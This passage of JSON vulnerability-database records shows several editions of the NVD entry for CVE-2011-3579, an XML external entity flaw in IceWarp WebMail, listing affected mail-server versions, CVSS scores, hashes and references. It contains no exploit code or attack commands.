HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:11:21", "references": [{"idList": ["EDB-ID:36165"], "type": "exploitdb"}, {"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2019-05-29T18:11:21", "rev": 2, "value": 5.8, "vector": "NONE"}}, "hash": "e9df8cf71606989a5950816ebfbaf569fdef4a596ae984a67431fbba949ee185", "hashmap": [{"hash": "8c88ddd69a6143ba0ab41056d05284e3", "key": "description"}, {"hash": "315d7a7b15cda393ce9fffb73645c6c3", "key": "cvss2"}, {"hash": "acb58295164021e06f84e34abe5636d6", "key": "cpe23"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "0d64f87567085d85fe7d76d6770ce536", "key": "cpe"}, {"hash": "3cde474b2224e87bfd63c573a9755353", "key": "href"}, {"hash": "873d8334dac92d89e23af0e7431aa456", "key": "cvelist"}, {"hash": "9b257ef804cfe63c30c04ab15f4e91cd", "key": "cvss"}, {"hash": "86bba9f2ca4a7fd1c9e14dc44bf74c08", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1c0be0631b7bf4c3a8c83298e68c99eb", "key": "cwe"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b7db5d3270b65057ac35eed580d4c1fd", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "e728fe78c8a26e84c8a6fd61e3ddef5c", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3579", "id": "CVE-2011-3579", "lastseen": "2019-05-29T18:11:21", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70025", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://www.osvdb.org/75721", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3579", "type": "cve", "viewCount": 1}, "differentElements": ["cpe23", "cpe", "affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:11:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-3579"], "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-399"], "description": "server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T19:39:11", "references": [{"idList": ["EDB-ID:36165"], "type": "exploitdb"}, {"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-12-09T19:39:11", "rev": 2, "value": 5.8, "vector": "NONE"}}, "extraReferences": [], "hash": "531caf8fac21818366b1ac00f2e0739b887fe3eb374a880cf1520303fdb7ba42", "hashmap": [{"hash": "8c88ddd69a6143ba0ab41056d05284e3", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "315d7a7b15cda393ce9fffb73645c6c3", "key": "cvss2"}, {"hash": "8372bab5a2b07ce8c58960126bc7fa81", "key": "cpeConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "3cde474b2224e87bfd63c573a9755353", "key": "href"}, {"hash": "873d8334dac92d89e23af0e7431aa456", "key": "cvelist"}, {"hash": "ad748ca54d687532479fdfb825a5f871", "key": "affectedSoftware"}, {"hash": "9b257ef804cfe63c30c04ab15f4e91cd", "key": "cvss"}, {"hash": "86bba9f2ca4a7fd1c9e14dc44bf74c08", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "1c0be0631b7bf4c3a8c83298e68c99eb", "key": "cwe"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b7db5d3270b65057ac35eed580d4c1fd", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3579", "id": "CVE-2011-3579", "lastseen": "2020-12-09T19:39:11", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70025", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://www.osvdb.org/75721", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3579", "type": "cve", "viewCount": 3}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T19:39:11"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "*"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-3579"], "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-399"], "description": "server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-29T23:05:22", "references": [{"idList": ["EDB-ID:36165"], "type": "exploitdb"}, {"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-11-29T23:05:22", "rev": 2, "value": 5.8, "vector": "NONE"}}, "hash": "8fcf22c0e485995af64ccd3a57bf375663878c74e0060c8526ab3a5c6b3c2eb6", "hashmap": [{"hash": "8c88ddd69a6143ba0ab41056d05284e3", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "315d7a7b15cda393ce9fffb73645c6c3", "key": "cvss2"}, {"hash": "8372bab5a2b07ce8c58960126bc7fa81", "key": "cpeConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "c6801e140f45bd3e98a3d0c9b533987e", "key": "affectedSoftware"}, {"hash": "3cde474b2224e87bfd63c573a9755353", "key": "href"}, {"hash": "873d8334dac92d89e23af0e7431aa456", "key": "cvelist"}, {"hash": "9b257ef804cfe63c30c04ab15f4e91cd", "key": "cvss"}, {"hash": "86bba9f2ca4a7fd1c9e14dc44bf74c08", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "1c0be0631b7bf4c3a8c83298e68c99eb", "key": "cwe"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b7db5d3270b65057ac35eed580d4c1fd", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3579", "id": "CVE-2011-3579", "lastseen": "2020-11-29T23:05:22", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70025", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://www.osvdb.org/75721", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3579", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-29T23:05:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", 